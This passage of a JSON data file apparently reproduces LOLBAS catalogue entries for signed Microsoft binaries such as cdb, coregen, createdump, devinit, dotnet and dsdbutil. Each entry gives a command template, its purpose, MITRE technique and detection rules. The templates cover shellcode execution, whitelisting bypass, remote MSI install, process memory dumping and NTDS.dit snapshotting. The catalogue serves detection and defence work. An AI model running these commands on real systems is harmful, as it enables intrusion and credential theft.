default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"]},{"id":"lolbas:cdb-exe:0","toolId":"lolbas:cdb-exe","toolName":"Cdb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cdb.exe -cf {PATH:.wds} -o notepad.exe","description":"Launch 64-bit shellcode from the specified .wds file using cdb.exe.","usecase":"Local execution of assembly shellcode.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html","https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options","https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda","https://mrd0x.com/the-power-of-cdb-debugging-tool/","https://twitter.com/nas_bench/status/1534957360032120833","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/"]},{"id":"lolbas:cdb-exe:1","toolId":"lolbas:cdb-exe","toolName":"Cdb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cdb.exe -pd -pn {process_name}\n.shell {CMD}","description":"Attaching to any process and executing shell commands.","usecase":"Run a shell command under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html","https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options","https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda","https://mrd0x.com/the-power-of-cdb-debugging-tool/","https://twitter.com/nas_bench/status/1534957360032120833","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/"]},{"id":"lolbas:cdb-exe:2","toolId":"lolbas:cdb-exe","toolName":"Cdb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cdb.exe -c {PATH:.txt} \"{CMD}\"","description":"Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).","usecase":"Run commands under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html","https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options","https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda","https://mrd0x.com/the-power-of-cdb-debugging-tool/","https://twitter.com/nas_bench/status/1534957360032120833","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/"]},{"id":"lolbas:coregen-exe:0","toolId":"lolbas:coregen-exe","toolName":"coregen.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name","description":"Loads the target .DLL in arbitrary path specified with /L.","usecase":"Execute DLL code","mitre":["T1055"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe","C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml"},{"type":"IOC","value":"coregen.exe loading .dll file not in \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\""},{"type":"IOC","value":"coregen.exe loading .dll file not named coreclr.dll"},{"type":"IOC","value":"coregen.exe command line containing -L or -l"},{"type":"IOC","value":"coregen.exe command line containing unexpected/invald assembly name"},{"type":"IOC","value":"coregen.exe application crash by invalid assembly name"}],"references":["https://www.youtube.com/watch?v=75XImxOOInU","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/coregen/"]},{"id":"lolbas:coregen-exe:1","toolId":"lolbas:coregen-exe","toolName":"coregen.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"coregen.exe dummy_assembly_name","description":"Loads the coreclr.dll in the corgen.exe directory (e.g. C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0).","usecase":"Execute DLL code","mitre":["T1055"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe","C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml"},{"type":"IOC","value":"coregen.exe loading .dll file not in \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\""},{"type":"IOC","value":"coregen.exe loading .dll file not named coreclr.dll"},{"type":"IOC","value":"coregen.exe command line containing -L or -l"},{"type":"IOC","value":"coregen.exe command line containing unexpected/invald assembly name"},{"type":"IOC","value":"coregen.exe application crash by invalid assembly name"}],"references":["https://www.youtube.com/watch?v=75XImxOOInU","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/coregen/"]},{"id":"lolbas:coregen-exe:2","toolId":"lolbas:coregen-exe","toolName":"coregen.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name","description":"Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.","usecase":"Execute DLL code","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe","C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml"},{"type":"IOC","value":"coregen.exe loading .dll file not in \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\""},{"type":"IOC","value":"coregen.exe loading .dll file not named coreclr.dll"},{"type":"IOC","value":"coregen.exe command line containing -L or -l"},{"type":"IOC","value":"coregen.exe command line containing unexpected/invald assembly name"},{"type":"IOC","value":"coregen.exe application crash by invalid assembly name"}],"references":["https://www.youtube.com/watch?v=75XImxOOInU","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/coregen/"]},{"id":"lolbas:createdump-exe:0","toolId":"lolbas:createdump-exe","toolName":"Createdump.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"createdump.exe -n -f {PATH:.dmp} {PID}","description":"Dump process by PID and create a minidump file. If \"-f dump.dmp\" is not specified, the file is created as '%TEMP%\\dump.%p.dmp' where %p is the PID of the target process.","usecase":"Dump process memory contents using PID.","mitre":["T1003"],"privilege":"system","fullPath":["C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\<version>\\createdump.exe","C:\\Program Files (x86)\\dotnet\\shared\\Microsoft.NETCore.App\\<version>\\createdump.exe","C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml"},{"type":"IOC","value":"createdump.exe process with a command line containing the lsass.exe process id"}],"references":["https://twitter.com/bopin2020/status/1366400799199272960","https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/"]},{"id":"lolbas:csi-exe:0","toolId":"lolbas:csi-exe","toolName":"csi.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"csi.exe {PATH:.cs}","description":"Use csi.exe to run unsigned C# code.","usecase":"Local execution of unsigned C# code.","mitre":["T1127"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\MSBuild\\15.0\\Bin\\Roslyn\\csi.exe","c:\\Program Files (x86)\\Microsoft Web Tools\\Packages\\Microsoft.Net.Compilers.X.Y.Z\\tools\\csi.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://twitter.com/subTee/status/781208810723549188","https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/csi/"]},{"id":"lolbas:defaultpack-exe:0","toolId":"lolbas:defaultpack-exe","toolName":"DefaultPack.EXE","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"DefaultPack.EXE /C:\"{CMD}\"","description":"Use DefaultPack.EXE to execute arbitrary binaries, with added argument support.","usecase":"Can be used to execute stagers, binaries, and other malicious commands.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\DefaultPack\\DefaultPack.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml"},{"type":"IOC","value":"DefaultPack.EXE spawned an unknown process"}],"references":["https://twitter.com/checkymander/status/1311509470275604480.","https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/"]},{"id":"lolbas:devinit-exe:0","toolId":"lolbas:devinit-exe","toolName":"Devinit.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"devinit.exe run -t msi-install -i {REMOTEURL:.msi}","description":"Downloads an MSI file to C:\\Windows\\Installer and then installs it.","usecase":"Executes code from a (remote) MSI file.","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\Tools\\devinit\\devinit.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\Tools\\devinit\\devinit.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml"}],"references":["https://twitter.com/mrd0x/status/1460815932402679809","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/"]},{"id":"lolbas:devtoolslauncher-exe:0","toolId":"lolbas:devtoolslauncher-exe","toolName":"Devtoolslauncher.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"devtoolslauncher.exe LaunchForDeploy {PATH_ABSOLUTE:.exe} \"{CMD:args}\" test","description":"The above binary will execute other binary.","usecase":"Execute any binary with given arguments and it will call `developertoolssvc.exe`. `developertoolssvc` is actually executing the binary.","mitre":["T1127"],"privilege":"user","fullPath":["c:\\windows\\system32\\devtoolslauncher.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml"},{"type":"IOC","value":"DeveloperToolsSvc.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1179811992841797632","https://www.virustotal.com/gui/file/84877a507af8b70c145777a87eaf28a8327c50a1563fe650f34572bef8a42ff6/details","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/"]},{"id":"lolbas:devtoolslauncher-exe:1","toolId":"lolbas:devtoolslauncher-exe","toolName":"Devtoolslauncher.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"devtoolslauncher.exe LaunchForDebug {PATH_ABSOLUTE:.exe} \"{CMD:args}\" test","description":"The above binary will execute other binary.","usecase":"Execute any binary with given arguments.","mitre":["T1127"],"privilege":"user","fullPath":["c:\\windows\\system32\\devtoolslauncher.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml"},{"type":"IOC","value":"DeveloperToolsSvc.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1179811992841797632","https://www.virustotal.com/gui/file/84877a507af8b70c145777a87eaf28a8327c50a1563fe650f34572bef8a42ff6/details","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/"]},{"id":"lolbas:dnx-exe:0","toolId":"lolbas:dnx-exe","toolName":"dnx.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dnx.exe {PATH_ABSOLUTE:folder}","description":"Execute C# code located in the specified folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)","usecase":"Local execution of C# project stored in consoleapp folder.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dnx/"]},{"id":"lolbas:dotnet-exe:0","toolId":"lolbas:dotnet-exe","toolName":"Dotnet.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"dotnet.exe {PATH:.dll}","description":"dotnet.exe will execute any DLL even if applocker is enabled.","usecase":"Execute code bypassing AWL","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"dotnet.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1204705548668555264","https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc","https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/","https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"]},{"id":"lolbas:dotnet-exe:1","toolId":"lolbas:dotnet-exe","toolName":"Dotnet.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dotnet.exe {PATH:.dll}","description":"dotnet.exe will execute any DLL.","usecase":"Execute DLL","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"dotnet.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1204705548668555264","https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc","https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/","https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"]},{"id":"lolbas:dotnet-exe:2","toolId":"lolbas:dotnet-exe","toolName":"Dotnet.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dotnet.exe fsi","description":"dotnet.exe will open a console which allows for the execution of arbitrary F# commands","usecase":"Execute arbitrary F# code","mitre":["T1059"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"dotnet.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1204705548668555264","https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc","https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/","https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"]},{"id":"lolbas:dotnet-exe:3","toolId":"lolbas:dotnet-exe","toolName":"Dotnet.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"dotnet.exe msbuild {PATH:.csproj}","description":"dotnet.exe with msbuild (SDK Version) will execute unsigned code","usecase":"Execute code bypassing AWL","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"dotnet.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1204705548668555264","https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc","https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/","https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"]},{"id":"lolbas:dsdbutil-exe:0","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"create\" \"quit\" \"quit\"","description":"dsdbutil supports VSS snapshot creation","usecase":"Snapshoting of Active Directory NTDS.dit database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"]},{"id":"lolbas:dsdbutil-exe:1","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"mount {GUID}\" \"quit\" \"quit\"","description":"Mounting the snapshot with its GUID","usecase":"Mounting the snapshot to access the ntds.dit with `copy c:\\<Snap Volume>\\windows\\ntds\\ntds.dit c:\\users\\administrator\\desktop\\ntds.dit.bak`","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"]},{"id":"lolbas:dsdbutil-exe:2","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"delete {GUID}\" \"quit\" \"quit\"","description":"Deletes the mount of the snapshot","usecase":"Deletes the snapshot","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"]},{"id":"lolbas:dsdbutil-exe:3","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"create\" \"list all\" \"mount 1\" \"quit\" \"quit\"","description":"Mounting with snapshot identifier","usecase":"Mounting the snapshot identifier 1 and accessing it with `copy c:\\<Snap Volume>\\windows\\ntds\\ntds.dit c:\\users\\administrator\\desktop\\ntds.dit.bak`","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"]},{"id":"lolbas:dsdbutil-exe:4","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"list all\" \"delete 1\" \"quit\" \"quit\"","description":"Deletes the mount of the snapshot","usecase":"deletes the snapshot","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow 